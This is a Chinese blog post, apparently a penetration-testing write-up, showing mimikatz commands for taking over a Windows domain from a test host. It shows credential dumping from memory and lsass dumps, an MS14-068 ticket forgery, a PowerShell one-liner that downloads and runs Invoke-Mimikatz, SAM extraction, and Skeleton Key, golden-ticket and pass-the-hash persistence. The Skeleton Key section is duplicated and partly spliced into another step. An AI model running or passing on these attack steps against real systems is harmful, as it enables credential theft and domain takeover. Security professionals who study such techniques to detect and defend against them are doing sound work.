内网渗透中mimikatz的使用

0x01 简介

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

0x02 测试环境

网络资源管理模式:

已有资源:

域内一台主机权限

操作系统:win7 x64

域权限:普通用户

0x03 测试目标

1、获得域控权限 2、导出所有用户口令 3、维持域控权限

0x04 测试过程

1、获取本机信息

mimikatz:

privilege::debug

sekurlsa::logonpasswords


获取本机用户名、口令、sid、LM hash、NTLM hash 如图

2、攻击域控,获得权限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d

生成伪造缓存test.ccache:

导入伪造缓存: mimikatz:

kerberos::ptc test.ccache

登陆:

net use \\A-635ECAEE64804.TEST.LOCAL

dir \\A-635ECAEE64804.TEST.LOCAL\c$


3、导出域

(1)直接获取内存口令 mimikatz:

privilege::debug

sekurlsa::logonpasswords

(2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

(3)通过powershell加载mimikatz获取口令

powershell IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

(4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:

lsadump::sam SYSTEM.hiv SAM.hiv持域控权限

(1)Skeleton Key mimikatz:


privilege::debug

misc::skeleton

万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test


4、维持域控权限

(1)Skeleton Key mimikatz:

privilege::debugmisc::skeleton

万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test


(2)golden ticket mimikatz:

lsadump::lsa /patch

获取krbtgt的ntlmhash,如图

生成万能票据: mimikatz:

kerberos::golden /user:Administrator /domain:test.local/sid:S-1-5-21-2848411111-3820811111-1717111111/krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi

导入票据: mimikatz:

kerberos::ptt test.kirbi

登陆域控:net use \\A-635ECAEE64804.TEST.LOCAL

dir \\A-635ECAEE64804.TEST.LOCAL\c$


Tips:

Golden Ticket不多说,自行理解

By default, the Golden Ticket default lifetime is 10 years

password changing/smartcard usage does not invalidate Golden Ticket;

this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;

NTLM hash of krbtgt account is never changed automatically.

(3)Pass-The-Hash mimikatz:

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

5、补充

登陆域控,刷新扫雷记录,留下名字;D mimikatz:

minesweeper::infos

如图

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 这篇文章介绍了Mobile BI(移动商务智能)使用过程中涉及的各种身份认证的方式,主要目的是对这些方式的原理进行...
    雨_树阅读 2,060评论 1 2
  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 3,771评论 0 10
  • ** 今天看了一下kafka官网,尝试着在自己电脑上安装和配置,然后学一下官方document。** Introd...
    RainChang阅读 5,044评论 1 30
  • 努力让异步一点也不麻烦 很简单的例子: 自己模拟一下上面的效果 OK,完美,promise的用处远远不止这些,先写...
    反者道之动001阅读 248评论 0 0
  • 一 小狗先生。 这个名字不是我起的,是他自己说的。 今年32,自己在韩国。 失过恋,辍过学,吸过毒,出过国。他自己...
    Trashpanda阅读 400评论 0 0